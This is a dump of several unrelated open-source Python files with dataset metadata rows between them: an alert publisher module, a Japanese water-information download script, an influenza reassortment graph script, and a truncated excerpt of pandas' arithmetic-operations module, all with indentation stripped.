elif isinstance(structure, dict):
for key in structure:
_recursive_enumerate_fields(structure[key], output_reference, '{prefix}{key}'.format(
prefix='{}.'.format(path) if path else '', # Omit first period
key=key
))
else:
output_reference[path] = structure
output = {}
_recursive_enumerate_fields(publication, output)
return OrderedDict(sorted(output.items()))
@Register
def populate_fields(alert, publication):
"""This publisher moves all requested fields to the top level and ignores everything else.
It uses the context to determine which fields to keep. Example:
context={
'populate_fields': [ 'field1', 'field2', 'field3' ]
}
"populate_fields" should be an array of strings that are exact matches to the field names.
The algorithm deeply searches the publication for any dict key that exactly matches one of the
given fields. It then takes the contents of that field and moves them up to the top level.
It discovers ALL values matching each field, so if a field is returned multiple times, the
resulting top level field will be an array. In the special case where exactly one entry is
returned for a populate_field, the value will instead be equal to that value (instead of an
array with 1 element being that value). In the special case when no entries are returned for
an extract_field, the value will be None.
Aside from the moved fields, this publisher throws away everything else in the original
publication.
NOTE: It is possible for moved fields to continue to contain nested dicts, so do not assume
this publisher will result in a flat dictionary publication.
"""
new_publication = {}
for populate_field in alert.context.get('populate_fields', []):
extractions = get_keys(publication, populate_field)
new_publication[populate_field] = extractions
return new_publication
@Register
class StringifyArrays(AlertPublisher):
"""Deeply navigates a dict publication and coverts all scalar arrays to strings
Any array discovered with only scalar values will be joined into a single string with the
given DELIMITER. Subclass implementations of this can override the delimiter to join the
string differently.
"""
DELIMITER = '\n'
def publish(self, alert, publication):
fringe = deque()
fringe.append(publication)
while len(fringe) > 0:
next_item = fringe.popleft()
if isinstance(next_item, dict):
# Check all keys
for key, item in next_item.items():
if self.is_scalar_array(item):
next_item[key] = self.stringify(item)
else:
fringe.append(item)
elif isinstance(next_item, list):
# At this point, if the item is a list we assert that it is not a SCALAR array;
# because it is too late to stringify it, since we do not have a back reference
# to the object that contains it
fringe.extend(next_item)
else:
# It's a leaf node, or it's some strange object that doesn't belong here
pass
return publication
@staticmethod
def is_scalar_array(item):
"""Returns if the given item is a python list containing only scalar elements
NOTE: This method assumes that the 'item' provided comes from a valid JSON compliant dict.
It does not account for strange or complicated types, such as references to functions
or class definitions or other stuff.
Args:
item (mixed): The python variable to check
Returns:
bool
"""
if not isinstance(item, list):
return False
for element in item:
if isinstance(element, dict) or isinstance(element, list):
return False
return True
@classmethod
def stringify(cls, array):
"""Given a list of elements, will join them together with the publisher's DELIMITER
Args:
array (list): The array of elements.
Returns:
str
"""
return cls.DELIMITER.join([str(elem) for elem in array])
|
apache-2.0
| 7,216,611,972,438,715,000
| 33.230769
| 101
| 0.656929
| false
| 4.479866
| false
| false
| false
|
i-kiwamu/jwis
|
jwis/__init__.py
|
1
|
1554
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import date, timedelta
import sys
import pandas as pd
import codecs
from .jwislib import JWIS
sys_encoding = sys.stdout.encoding
try:
input = raw_input
except NameError:
pass
def ask_date():
print("Beginning date")
d_start_year = int(input(" year? "))
d_start_month = int(input(" month? "))
d_start_date = int(input(" date? "))
d_start = date(d_start_year, d_start_month, d_start_date)
print("Final date")
d_end_year = int(input(" year? "))
d_end_month = int(input(" month? "))
d_end_date = int(input(" date? "))
d_end = date(d_end_year, d_end_month, d_end_date)
return (d_start, d_end)
def ask_obs_type():
print("Choose type of observation")
print(" 1: flow rate & height")
print(" 2: dam")
obs_type = input(" Selection: ")
return int(obs_type)
def ask_observatory():
obs_id = input("Input observatory ID: ")
return obs_id
def main():
date_periods = ask_date()
d_start = date_periods[0]
d_end = date_periods[1]
if d_start > d_end:
d_start, d_end = d_end, d_start
obs_type = ask_obs_type()
obs_id = ask_observatory()
output_filename = input("saving file name? ")
jwis = JWIS(obs_type, obs_id, d_start, d_end, "NO")
if obs_type == 1: # flow rate & height
jwis_table = jwis.retrieve_hq_data()
elif obs_type == 2: # dam
jwis_table = jwis.retrieve_data('1')
jwis_table.to_csv(output_filename)
print("Done")
|
gpl-3.0
| -16,430,081,994,334,884
| 22.907692
| 61
| 0.593951
| false
| 2.915572
| false
| false
| false
|
ericmjl/influenza-reassortment-detector
|
second_search.py
|
1
|
1571
|
import networkx as nx
import numpy as np
import pickle as pkl
import sys
class SecondSearchIdentifier(object):
"""
SecondSearchIdentifier
Identifies isolates for which a source pair search will be performed.
"""
def __init__(self, handle, percentile):
super(SecondSearchIdentifier, self).__init__()
self.handle = handle
self.percentile = percentile
self.G = None
self.pwi_distribution = []
self.cutoff_pwi = None
self.source_pair_nodes = []
def run(self):
self.G = nx.read_gpickle('{0} Full Complement Graph.pkl'.format(self.handle))
self.identify_sourceless_isolates()
self.get_pwi_distribution()
self.compute_cutoff_pwi()
self.identify_lowpwi_isolates()
self.write_second_search_list()
def identify_sourceless_isolates(self):
for n, d in self.G.nodes(data=True):
if len(self.G.in_edges(n)) == 0:
self.source_pair_nodes.append(n)
def get_pwi_distribution(self):
for n1, n2, d in self.G.edges(data=True):
self.pwi_distribution.append(d['pwi'])
def compute_cutoff_pwi(self):
self.cutoff_pwi = np.percentile(self.pwi_distribution, self.percentile)
def identify_lowpwi_isolates(self):
for n1, n2, d in self.G.edges(data=True):
if d['pwi'] < self.cutoff_pwi:
self.source_pair_nodes.append(n2)
def write_second_search_list(self):
with open('{0} Isolates for Source Pair Search.pkllist'.format(self.handle), 'wb') as f:
pkl.dump(self.source_pair_nodes, f)
if __name__ == '__main__':
handle = sys.argv[1]
percentile = int(sys.argv[2])
ssi = SecondSearchIdentifier(handle, percentile)
ssi.run()
|
mit
| -8,981,593,487,873,865,000
| 27.071429
| 90
| 0.705283
| false
| 2.82554
| false
| false
| false
|
kushalbhola/MyStuff
|
Practice/PythonApplication/env/Lib/site-packages/pandas/core/ops/__init__.py
|
1
|
55485
|
"""
Arithmetic operations for PandasObjects
This is not a public API.
"""
import datetime
import operator
import textwrap
from typing import Any, Callable
import warnings
import numpy as np
from pandas._libs import Timedelta, Timestamp, lib, ops as libops
from pandas.errors import NullFrequencyError
from pandas.util._decorators import Appender
from pandas.core.dtypes.cast import (
construct_1d_object_array_from_listlike,
find_common_type,
maybe_upcast_putmask,
)
from pandas.core.dtypes.common import (
ensure_object,
is_bool_dtype,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_datetimelike_v_numeric,
is_extension_array_dtype,
is_integer_dtype,
is_list_like,
is_object_dtype,
is_period_dtype,
is_scalar,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCDatetimeArray,
ABCIndex,
ABCIndexClass,
ABCSeries,
ABCSparseArray,
ABCSparseSeries,
ABCTimedeltaArray,
)
from pandas.core.dtypes.missing import isna, notna
import pandas as pd
from pandas._typing import ArrayLike
import pandas.core.common as com
from . import missing
from .docstrings import (
_arith_doc_FRAME,
_flex_comp_doc_FRAME,
_make_flex_doc,
_op_descriptions,
)
from .roperator import ( # noqa:F401
radd,
rand_,
rdiv,
rdivmod,
rfloordiv,
rmod,
rmul,
ror_,
rpow,
rsub,
rtruediv,
rxor,
)
# -----------------------------------------------------------------------------
# Ops Wrapping Utilities
def get_op_result_name(left, right):
"""
Find the appropriate name to pin to an operation result. This result
should always be either an Index or a Series.
Parameters
----------
left : {Series, Index}
right : object
Returns
-------
name : object
Usually a string
"""
# `left` is always a pd.Series when called from within ops
if isinstance(right, (ABCSeries, ABCIndexClass)):
name = _maybe_match_name(left, right)
else:
name = left.name
return name
def _maybe_match_name(a, b):
"""
Try to find a name to attach to the result of an operation between
a and b. If only one of these has a `name` attribute, return that
name. Otherwise return a consensus name if they match of None if
they have different names.
Parameters
----------
a : object
b : object
Returns
-------
name : str or None
See Also
--------
pandas.core.common.consensus_name_attr
"""
a_has = hasattr(a, "name")
b_has = hasattr(b, "name")
if a_has and b_has:
if a.name == b.name:
return a.name
else:
# TODO: what if they both have np.nan for their names?
return None
elif a_has:
return a.name
elif b_has:
return b.name
return None
def maybe_upcast_for_op(obj):
"""
Cast non-pandas objects to pandas types to unify behavior of arithmetic
and comparison operations.
Parameters
----------
obj: object
Returns
-------
out : object
Notes
-----
Be careful to call this *after* determining the `name` attribute to be
attached to the result of the arithmetic operation.
"""
if type(obj) is datetime.timedelta:
# GH#22390 cast up to Timedelta to rely on Timedelta
# implementation; otherwise operation against numeric-dtype
# raises TypeError
return Timedelta(obj)
elif isinstance(obj, np.timedelta64) and not isna(obj):
# In particular non-nanosecond timedelta64 needs to be cast to
# nanoseconds, or else we get undesired behavior like
# np.timedelta64(3, 'D') / 2 == np.timedelta64(1, 'D')
# The isna check is to avoid casting timedelta64("NaT"), which would
# return NaT and incorrectly be treated as a datetime-NaT.
return Timedelta(obj)
elif isinstance(obj, np.ndarray) and is_timedelta64_dtype(obj):
# GH#22390 Unfortunately we need to special-case right-hand
# timedelta64 dtypes because numpy casts integer dtypes to
# timedelta64 when operating with timedelta64
return pd.TimedeltaIndex(obj)
return obj
# -----------------------------------------------------------------------------
def make_invalid_op(name):
"""
Return a binary method that always raises a TypeError.
Parameters
----------
name : str
Returns
-------
invalid_op : function
"""
def invalid_op(self, other=None):
raise TypeError(
"cannot perform {name} with this index type: "
"{typ}".format(name=name, typ=type(self).__name__)
)
invalid_op.__name__ = name
return invalid_op
def _gen_eval_kwargs(name):
"""
Find the keyword arguments to pass to numexpr for the given operation.
Parameters
----------
name : str
Returns
-------
eval_kwargs : dict
Examples
--------
>>> _gen_eval_kwargs("__add__")
{}
>>> _gen_eval_kwargs("rtruediv")
{'reversed': True, 'truediv': True}
"""
kwargs = {}
# Series appear to only pass __add__, __radd__, ...
# but DataFrame gets both these dunder names _and_ non-dunder names
# add, radd, ...
name = name.replace("__", "")
if name.startswith("r"):
if name not in ["radd", "rand", "ror", "rxor"]:
# Exclude commutative operations
kwargs["reversed"] = True
if name in ["truediv", "rtruediv"]:
kwargs["truediv"] = True
if name in ["ne"]:
kwargs["masker"] = True
return kwargs
def _get_frame_op_default_axis(name):
"""
Only DataFrame cares about default_axis, specifically:
special methods have default_axis=None and flex methods
have default_axis='columns'.
Parameters
----------
name : str
Returns
-------
default_axis: str or None
"""
if name.replace("__r", "__") in ["__and__", "__or__", "__xor__"]:
# bool methods
return "columns"
elif name.startswith("__"):
# __add__, __mul__, ...
return None
else:
# add, mul, ...
return "columns"
def _get_opstr(op, cls):
"""
Find the operation string, if any, to pass to numexpr for this
operation.
Parameters
----------
op : binary operator
cls : class
Returns
-------
op_str : string or None
"""
# numexpr is available for non-sparse classes
subtyp = getattr(cls, "_subtyp", "")
use_numexpr = "sparse" not in subtyp
if not use_numexpr:
# if we're not using numexpr, then don't pass a str_rep
return None
return {
operator.add: "+",
radd: "+",
operator.mul: "*",
rmul: "*",
operator.sub: "-",
rsub: "-",
operator.truediv: "/",
rtruediv: "/",
operator.floordiv: "//",
rfloordiv: "//",
operator.mod: None, # TODO: Why None for mod but '%' for rmod?
rmod: "%",
operator.pow: "**",
rpow: "**",
operator.eq: "==",
operator.ne: "!=",
operator.le: "<=",
operator.lt: "<",
operator.ge: ">=",
operator.gt: ">",
operator.and_: "&",
rand_: "&",
operator.or_: "|",
ror_: "|",
operator.xor: "^",
rxor: "^",
divmod: None,
rdivmod: None,
}[op]
def _get_op_name(op, special):
"""
Find the name to attach to this method according to conventions
for special and non-special methods.
Parameters
----------
op : binary operator
special : bool
Returns
-------
op_name : str
"""
opname = op.__name__.strip("_")
if special:
opname = "__{opname}__".format(opname=opname)
return opname
# -----------------------------------------------------------------------------
# Masking NA values and fallbacks for operations numpy does not support
def fill_binop(left, right, fill_value):
"""
If a non-None fill_value is given, replace null entries in left and right
with this value, but only in positions where _one_ of left/right is null,
not both.
Parameters
----------
left : array-like
right : array-like
fill_value : object
Returns
-------
left : array-like
right : array-like
Notes
-----
Makes copies if fill_value is not None
"""
# TODO: can we make a no-copy implementation?
if fill_value is not None:
left_mask = isna(left)
right_mask = isna(right)
left = left.copy()
right = right.copy()
# one but not both
mask = left_mask ^ right_mask
left[left_mask & mask] = fill_value
right[right_mask & mask] = fill_value
return left, right
def mask_cmp_op(x, y, op):
"""
Apply the function `op` to only non-null points in x and y.
Parameters
----------
x : array-like
y : array-like
op : binary operation
Returns
-------
result : ndarray[bool]
"""
xrav = x.ravel()
result = np.empty(x.size, dtype=bool)
if isinstance(y, (np.ndarray, ABCSeries)):
yrav = y.ravel()
mask = notna(xrav) & notna(yrav)
result[mask] = op(np.array(list(xrav[mask])), np.array(list(yrav[mask])))
else:
mask = notna(xrav)
result[mask] = op(np.array(list(xrav[mask])), y)
if op == operator.ne: # pragma: no cover
np.putmask(result, ~mask, True)
else:
np.putmask(result, ~mask, False)
result = result.reshape(x.shape)
return result
def masked_arith_op(x, y, op):
"""
If the given arithmetic operation fails, attempt it again on
only the non-null elements of the input array(s).
Parameters
----------
x : np.ndarray
y : np.ndarray, Series, Index
op : binary operator
"""
# For Series `x` is 1D so ravel() is a no-op; calling it anyway makes
# the logic valid for both Series and DataFrame ops.
xrav = x.ravel()
assert isinstance(x, (np.ndarray, ABCSeries)), type(x)
if isinstance(y, (np.ndarray, ABCSeries, ABCIndexClass)):
dtype = find_common_type([x.dtype, y.dtype])
result = np.empty(x.size, dtype=dtype)
# PeriodIndex.ravel() returns int64 dtype, so we have
# to work around that case. See GH#19956
yrav = y if is_period_dtype(y) else y.ravel()
mask = notna(xrav) & notna(yrav)
if yrav.shape != mask.shape:
# FIXME: GH#5284, GH#5035, GH#19448
# Without specifically raising here we get mismatched
# errors in Py3 (TypeError) vs Py2 (ValueError)
# Note: Only = an issue in DataFrame case
raise ValueError("Cannot broadcast operands together.")
if mask.any():
with np.errstate(all="ignore"):
result[mask] = op(xrav[mask], com.values_from_object(yrav[mask]))
else:
assert is_scalar(y), type(y)
assert isinstance(x, np.ndarray), type(x)
# mask is only meaningful for x
result = np.empty(x.size, dtype=x.dtype)
mask = notna(xrav)
# 1 ** np.nan is 1. So we have to unmask those.
if op == pow:
mask = np.where(x == 1, False, mask)
elif op == rpow:
mask = np.where(y == 1, False, mask)
if mask.any():
with np.errstate(all="ignore"):
result[mask] = op(xrav[mask], y)
result, changed = maybe_upcast_putmask(result, ~mask, np.nan)
result = result.reshape(x.shape) # 2D compat
return result
def invalid_comparison(left, right, op):
"""
If a comparison has mismatched types and is not necessarily meaningful,
follow python3 conventions by:
- returning all-False for equality
- returning all-True for inequality
- raising TypeError otherwise
Parameters
----------
left : array-like
right : scalar, array-like
op : operator.{eq, ne, lt, le, gt}
Raises
------
TypeError : on inequality comparisons
"""
if op is operator.eq:
res_values = np.zeros(left.shape, dtype=bool)
elif op is operator.ne:
res_values = np.ones(left.shape, dtype=bool)
else:
raise TypeError(
"Invalid comparison between dtype={dtype} and {typ}".format(
dtype=left.dtype, typ=type(right).__name__
)
)
return res_values
# -----------------------------------------------------------------------------
# Dispatch logic
def should_series_dispatch(left, right, op):
"""
Identify cases where a DataFrame operation should dispatch to its
Series counterpart.
Parameters
----------
left : DataFrame
right : DataFrame
op : binary operator
Returns
-------
override : bool
"""
if left._is_mixed_type or right._is_mixed_type:
return True
if not len(left.columns) or not len(right.columns):
# ensure obj.dtypes[0] exists for each obj
return False
ldtype = left.dtypes.iloc[0]
rdtype = right.dtypes.iloc[0]
if (is_timedelta64_dtype(ldtype) and is_integer_dtype(rdtype)) or (
is_timedelta64_dtype(rdtype) and is_integer_dtype(ldtype)
):
# numpy integer dtypes as timedelta64 dtypes in this scenario
return True
if is_datetime64_dtype(ldtype) and is_object_dtype(rdtype):
# in particular case where right is an array of DateOffsets
return True
return False
def dispatch_to_series(left, right, func, str_rep=None, axis=None):
"""
Evaluate the frame operation func(left, right) by evaluating
column-by-column, dispatching to the Series implementation.
Parameters
----------
left : DataFrame
right : scalar or DataFrame
func : arithmetic or comparison operator
str_rep : str or None, default None
axis : {None, 0, 1, "index", "columns"}
Returns
-------
DataFrame
"""
# Note: we use iloc to access columns for compat with cases
# with non-unique columns.
import pandas.core.computation.expressions as expressions
right = lib.item_from_zerodim(right)
if lib.is_scalar(right) or np.ndim(right) == 0:
def column_op(a, b):
return {i: func(a.iloc[:, i], b) for i in range(len(a.columns))}
elif isinstance(right, ABCDataFrame):
assert right._indexed_same(left)
def column_op(a, b):
return {i: func(a.iloc[:, i], b.iloc[:, i]) for i in range(len(a.columns))}
elif isinstance(right, ABCSeries) and axis == "columns":
# We only get here if called via left._combine_match_columns,
# in which case we specifically want to operate row-by-row
assert right.index.equals(left.columns)
def column_op(a, b):
return {i: func(a.iloc[:, i], b.iloc[i]) for i in range(len(a.columns))}
elif isinstance(right, ABCSeries):
assert right.index.equals(left.index) # Handle other cases later
def column_op(a, b):
return {i: func(a.iloc[:, i], b) for i in range(len(a.columns))}
else:
# Remaining cases have less-obvious dispatch rules
raise NotImplementedError(right)
new_data = expressions.evaluate(column_op, str_rep, left, right)
result = left._constructor(new_data, index=left.index, copy=False)
# Pin columns instead of passing to constructor for compat with
# non-unique columns case
result.columns = left.columns
return result
def dispatch_to_index_op(op, left, right, index_class):
"""
Wrap Series left in the given index_class to delegate the operation op
to the index implementation. DatetimeIndex and TimedeltaIndex perform
type checking, timezone handling, overflow checks, etc.
Parameters
----------
op : binary operator (operator.add, operator.sub, ...)
left : Series
right : object
index_class : DatetimeIndex or TimedeltaIndex
Returns
-------
result : object, usually DatetimeIndex, TimedeltaIndex, or Series
"""
left_idx = index_class(left)
# avoid accidentally allowing integer add/sub. For datetime64[tz] dtypes,
# left_idx may inherit a freq from a cached DatetimeIndex.
# See discussion in GH#19147.
if getattr(left_idx, "freq", None) is not None:
left_idx = left_idx._shallow_copy(freq=None)
try:
result = op(left_idx, right)
except NullFrequencyError:
# DatetimeIndex and TimedeltaIndex with freq == None raise ValueError
# on add/sub of integers (or int-like). We re-raise as a TypeError.
raise TypeError(
"incompatible type for a datetime/timedelta "
"operation [{name}]".format(name=op.__name__)
)
return result
def dispatch_to_extension_op(op, left, right):
"""
Assume that left or right is a Series backed by an ExtensionArray,
apply the operator defined by op.
"""
# The op calls will raise TypeError if the op is not defined
# on the ExtensionArray
# unbox Series and Index to arrays
if isinstance(left, (ABCSeries, ABCIndexClass)):
new_left = left._values
else:
new_left = left
if isinstance(right, (ABCSeries, ABCIndexClass)):
new_right = right._values
else:
new_right = right
res_values = op(new_left, new_right)
res_name = get_op_result_name(left, right)
if op.__name__ in ["divmod", "rdivmod"]:
return _construct_divmod_result(left, res_values, left.index, res_name)
return _construct_result(left, res_values, left.index, res_name)
# -----------------------------------------------------------------------------
# Functions that add arithmetic methods to objects, given arithmetic factory
# methods
def _get_method_wrappers(cls):
"""
Find the appropriate operation-wrappers to use when defining flex/special
arithmetic, boolean, and comparison operations with the given class.
Parameters
----------
cls : class
Returns
-------
arith_flex : function or None
comp_flex : function or None
arith_special : function
comp_special : function
bool_special : function
Notes
-----
None is only returned for SparseArray
"""
if issubclass(cls, ABCSparseSeries):
# Be sure to catch this before ABCSeries and ABCSparseArray,
# as they will both come see SparseSeries as a subclass
arith_flex = _flex_method_SERIES
comp_flex = _flex_method_SERIES
arith_special = _arith_method_SPARSE_SERIES
comp_special = _arith_method_SPARSE_SERIES
bool_special = _bool_method_SERIES
# TODO: I don't think the functions defined by bool_method are tested
elif issubclass(cls, ABCSeries):
# Just Series; SparseSeries is caught above
arith_flex = _flex_method_SERIES
comp_flex = _flex_method_SERIES
arith_special = _arith_method_SERIES
comp_special = _comp_method_SERIES
bool_special = _bool_method_SERIES
elif issubclass(cls, ABCDataFrame):
# Same for DataFrame and SparseDataFrame
arith_flex = _arith_method_FRAME
comp_flex = _flex_comp_method_FRAME
arith_special = _arith_method_FRAME
comp_special = _comp_method_FRAME
bool_special = _arith_method_FRAME
return arith_flex, comp_flex, arith_special, comp_special, bool_special
def _create_methods(cls, arith_method, comp_method, bool_method, special):
# creates actual methods based upon arithmetic, comp and bool method
# constructors.
have_divmod = issubclass(cls, ABCSeries)
# divmod is available for Series and SparseSeries
# yapf: disable
new_methods = dict(
add=arith_method(cls, operator.add, special),
radd=arith_method(cls, radd, special),
sub=arith_method(cls, operator.sub, special),
mul=arith_method(cls, operator.mul, special),
truediv=arith_method(cls, operator.truediv, special),
floordiv=arith_method(cls, operator.floordiv, special),
# Causes a floating point exception in the tests when numexpr enabled,
# so for now no speedup
mod=arith_method(cls, operator.mod, special),
pow=arith_method(cls, operator.pow, special),
# not entirely sure why this is necessary, but previously was included
# so it's here to maintain compatibility
rmul=arith_method(cls, rmul, special),
rsub=arith_method(cls, rsub, special),
rtruediv=arith_method(cls, rtruediv, special),
rfloordiv=arith_method(cls, rfloordiv, special),
rpow=arith_method(cls, rpow, special),
rmod=arith_method(cls, rmod, special))
# yapf: enable
new_methods["div"] = new_methods["truediv"]
new_methods["rdiv"] = new_methods["rtruediv"]
if have_divmod:
# divmod doesn't have an op that is supported by numexpr
new_methods["divmod"] = arith_method(cls, divmod, special)
new_methods["rdivmod"] = arith_method(cls, rdivmod, special)
new_methods.update(
dict(
eq=comp_method(cls, operator.eq, special),
ne=comp_method(cls, operator.ne, special),
lt=comp_method(cls, operator.lt, special),
gt=comp_method(cls, operator.gt, special),
le=comp_method(cls, operator.le, special),
ge=comp_method(cls, operator.ge, special),
)
)
if bool_method:
new_methods.update(
dict(
and_=bool_method(cls, operator.and_, special),
or_=bool_method(cls, operator.or_, special),
# For some reason ``^`` wasn't used in original.
xor=bool_method(cls, operator.xor, special),
rand_=bool_method(cls, rand_, special),
ror_=bool_method(cls, ror_, special),
rxor=bool_method(cls, rxor, special),
)
)
if special:
dunderize = lambda x: "__{name}__".format(name=x.strip("_"))
else:
dunderize = lambda x: x
new_methods = {dunderize(k): v for k, v in new_methods.items()}
return new_methods
def add_methods(cls, new_methods):
for name, method in new_methods.items():
# For most methods, if we find that the class already has a method
# of the same name, it is OK to over-write it. The exception is
# inplace methods (__iadd__, __isub__, ...) for SparseArray, which
# retain the np.ndarray versions.
force = not (issubclass(cls, ABCSparseArray) and name.startswith("__i"))
if force or name not in cls.__dict__:
setattr(cls, name, method)
# ----------------------------------------------------------------------
# Arithmetic
def add_special_arithmetic_methods(cls):
"""
Adds the full suite of special arithmetic methods (``__add__``,
``__sub__``, etc.) to the class.
Parameters
----------
cls : class
special methods will be defined and pinned to this class
"""
_, _, arith_method, comp_method, bool_method = _get_method_wrappers(cls)
new_methods = _create_methods(
cls, arith_method, comp_method, bool_method, special=True
)
# inplace operators (I feel like these should get passed an `inplace=True`
# or just be removed
def _wrap_inplace_method(method):
"""
return an inplace wrapper for this method
"""
def f(self, other):
result = method(self, other)
# this makes sure that we are aligned like the input
# we are updating inplace so we want to ignore is_copy
self._update_inplace(
result.reindex_like(self, copy=False)._data, verify_is_copy=False
)
return self
f.__name__ = "__i{name}__".format(name=method.__name__.strip("__"))
return f
new_methods.update(
dict(
__iadd__=_wrap_inplace_method(new_methods["__add__"]),
__isub__=_wrap_inplace_method(new_methods["__sub__"]),
__imul__=_wrap_inplace_method(new_methods["__mul__"]),
__itruediv__=_wrap_inplace_method(new_methods["__truediv__"]),
__ifloordiv__=_wrap_inplace_method(new_methods["__floordiv__"]),
__imod__=_wrap_inplace_method(new_methods["__mod__"]),
__ipow__=_wrap_inplace_method(new_methods["__pow__"]),
)
)
new_methods.update(
dict(
__iand__=_wrap_inplace_method(new_methods["__and__"]),
__ior__=_wrap_inplace_method(new_methods["__or__"]),
__ixor__=_wrap_inplace_method(new_methods["__xor__"]),
)
)
add_methods(cls, new_methods=new_methods)
def add_flex_arithmetic_methods(cls):
"""
Adds the full suite of flex arithmetic methods (``pow``, ``mul``, ``add``)
to the class.
Parameters
----------
cls : class
flex methods will be defined and pinned to this class
"""
flex_arith_method, flex_comp_method, _, _, _ = _get_method_wrappers(cls)
new_methods = _create_methods(
cls, flex_arith_method, flex_comp_method, bool_method=None, special=False
)
new_methods.update(
dict(
multiply=new_methods["mul"],
subtract=new_methods["sub"],
divide=new_methods["div"],
)
)
# opt out of bool flex methods for now
assert not any(kname in new_methods for kname in ("ror_", "rxor", "rand_"))
add_methods(cls, new_methods=new_methods)
# -----------------------------------------------------------------------------
# Series
def _align_method_SERIES(left, right, align_asobject=False):
""" align lhs and rhs Series """
# ToDo: Different from _align_method_FRAME, list, tuple and ndarray
# are not coerced here
# because Series has inconsistencies described in #13637
if isinstance(right, ABCSeries):
# avoid repeated alignment
if not left.index.equals(right.index):
if align_asobject:
# to keep original value's dtype for bool ops
left = left.astype(object)
right = right.astype(object)
left, right = left.align(right, copy=False)
return left, right
def _construct_result(left, result, index, name, dtype=None):
"""
If the raw op result has a non-None name (e.g. it is an Index object) and
the name argument is None, then passing name to the constructor will
not be enough; we still need to override the name attribute.
"""
out = left._constructor(result, index=index, dtype=dtype)
out = out.__finalize__(left)
out.name = name
return out
def _construct_divmod_result(left, result, index, name, dtype=None):
"""divmod returns a tuple of like indexed series instead of a single series.
"""
return (
_construct_result(left, result[0], index=index, name=name, dtype=dtype),
_construct_result(left, result[1], index=index, name=name, dtype=dtype),
)
def _arith_method_SERIES(cls, op, special):
"""
Wrapper function for Series arithmetic operations, to avoid
code duplication.
"""
str_rep = _get_opstr(op, cls)
op_name = _get_op_name(op, special)
eval_kwargs = _gen_eval_kwargs(op_name)
construct_result = (
_construct_divmod_result if op in [divmod, rdivmod] else _construct_result
)
def na_op(x, y):
"""
Return the result of evaluating op on the passed in values.
If native types are not compatible, try coersion to object dtype.
Parameters
----------
x : array-like
y : array-like or scalar
Returns
-------
array-like
Raises
------
TypeError : invalid operation
"""
import pandas.core.computation.expressions as expressions
try:
result = expressions.evaluate(op, str_rep, x, y, **eval_kwargs)
except TypeError:
result = masked_arith_op(x, y, op)
return missing.dispatch_fill_zeros(op, x, y, result)
def wrapper(left, right):
if isinstance(right, ABCDataFrame):
return NotImplemented
left, right = _align_method_SERIES(left, right)
res_name = get_op_result_name(left, right)
right = maybe_upcast_for_op(right)
if is_categorical_dtype(left):
raise TypeError(
"{typ} cannot perform the operation "
"{op}".format(typ=type(left).__name__, op=str_rep)
)
elif is_datetime64_dtype(left) or is_datetime64tz_dtype(left):
# Give dispatch_to_index_op a chance for tests like
# test_dt64_series_add_intlike, which the index dispatching handles
# specifically.
result = dispatch_to_index_op(op, left, right, pd.DatetimeIndex)
return construct_result(
left, result, index=left.index, name=res_name, dtype=result.dtype
)
elif is_extension_array_dtype(left) or (
is_extension_array_dtype(right) and not is_scalar(right)
):
# GH#22378 disallow scalar to exclude e.g. "category", "Int64"
return dispatch_to_extension_op(op, left, right)
elif is_timedelta64_dtype(left):
result = dispatch_to_index_op(op, left, right, pd.TimedeltaIndex)
return construct_result(left, result, index=left.index, name=res_name)
elif is_timedelta64_dtype(right):
# We should only get here with non-scalar or timedelta64('NaT')
# values for right
# Note: we cannot use dispatch_to_index_op because
# that may incorrectly raise TypeError when we
# should get NullFrequencyError
orig_right = right
if is_scalar(right):
# broadcast and wrap in a TimedeltaIndex
assert np.isnat(right)
right = np.broadcast_to(right, left.shape)
right = pd.TimedeltaIndex(right)
assert isinstance(right, (pd.TimedeltaIndex, ABCTimedeltaArray, ABCSeries))
try:
result = op(left._values, right)
except NullFrequencyError:
if orig_right is not right:
# i.e. scalar timedelta64('NaT')
# We get a NullFrequencyError because we broadcast to
# TimedeltaIndex, but this should be TypeError.
raise TypeError(
"incompatible type for a datetime/timedelta "
"operation [{name}]".format(name=op.__name__)
)
raise
# We do not pass dtype to ensure that the Series constructor
# does inference in the case where `result` has object-dtype.
return construct_result(left, result, index=left.index, name=res_name)
elif isinstance(right, (ABCDatetimeArray, pd.DatetimeIndex)):
result = op(left._values, right)
return construct_result(left, result, index=left.index, name=res_name)
lvalues = left.values
rvalues = right
if isinstance(rvalues, (ABCSeries, ABCIndexClass)):
rvalues = rvalues._values
with np.errstate(all="ignore"):
result = na_op(lvalues, rvalues)
return construct_result(
left, result, index=left.index, name=res_name, dtype=None
)
wrapper.__name__ = op_name
return wrapper
def _comp_method_OBJECT_ARRAY(op, x, y):
if isinstance(y, list):
y = construct_1d_object_array_from_listlike(y)
if isinstance(y, (np.ndarray, ABCSeries, ABCIndex)):
if not is_object_dtype(y.dtype):
y = y.astype(np.object_)
if isinstance(y, (ABCSeries, ABCIndex)):
y = y.values
result = libops.vec_compare(x, y, op)
else:
result = libops.scalar_compare(x, y, op)
return result
def _comp_method_SERIES(cls, op, special):
"""
Wrapper function for Series arithmetic operations, to avoid
code duplication.
"""
op_name = _get_op_name(op, special)
masker = _gen_eval_kwargs(op_name).get("masker", False)
def na_op(x, y):
# TODO:
# should have guarantess on what x, y can be type-wise
# Extension Dtypes are not called here
# Checking that cases that were once handled here are no longer
# reachable.
assert not (is_categorical_dtype(y) and not is_scalar(y))
if is_object_dtype(x.dtype):
result = _comp_method_OBJECT_ARRAY(op, x, y)
elif is_datetimelike_v_numeric(x, y):
return invalid_comparison(x, y, op)
else:
# we want to compare like types
# we only want to convert to integer like if
# we are not NotImplemented, otherwise
# we would allow datetime64 (but viewed as i8) against
# integer comparisons
# we have a datetime/timedelta and may need to convert
assert not needs_i8_conversion(x)
mask = None
if not is_scalar(y) and needs_i8_conversion(y):
mask = isna(x) | isna(y)
y = y.view("i8")
x = x.view("i8")
method = getattr(x, op_name, None)
if method is not None:
with np.errstate(all="ignore"):
result = method(y)
if result is NotImplemented:
return invalid_comparison(x, y, op)
else:
result = op(x, y)
if mask is not None and mask.any():
result[mask] = masker
return result
def wrapper(self, other, axis=None):
# Validate the axis parameter
if axis is not None:
self._get_axis_number(axis)
res_name = get_op_result_name(self, other)
if isinstance(other, list):
# TODO: same for tuples?
other = np.asarray(other)
if isinstance(other, ABCDataFrame): # pragma: no cover
# Defer to DataFrame implementation; fail early
return NotImplemented
elif isinstance(other, ABCSeries) and not self._indexed_same(other):
